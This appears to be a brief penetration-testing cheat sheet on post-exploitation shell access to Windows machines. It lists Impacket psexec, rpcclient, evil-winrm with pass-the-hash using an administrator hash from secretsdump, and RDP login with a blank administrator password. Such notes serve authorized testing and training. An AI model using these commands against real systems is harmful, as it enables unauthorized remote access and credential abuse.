Skip to content

Post Exploit

Shell Access

bash
# Get shell via psexec (Impacket)
psexec.py user@TARGET_IP
bash
rpcclient
bash
evil-winrm -i $IP -u user

# Auth with admin hash (get via secretdump by example)
sudo evil-winrm -u "Administrator" -H <administator_hash> -i $IP
bash
# RDP
xfreerdp /u:administrator /p:'' /v:$IP # adminsitrator with blank pass

/cert:ignore # ignore certificat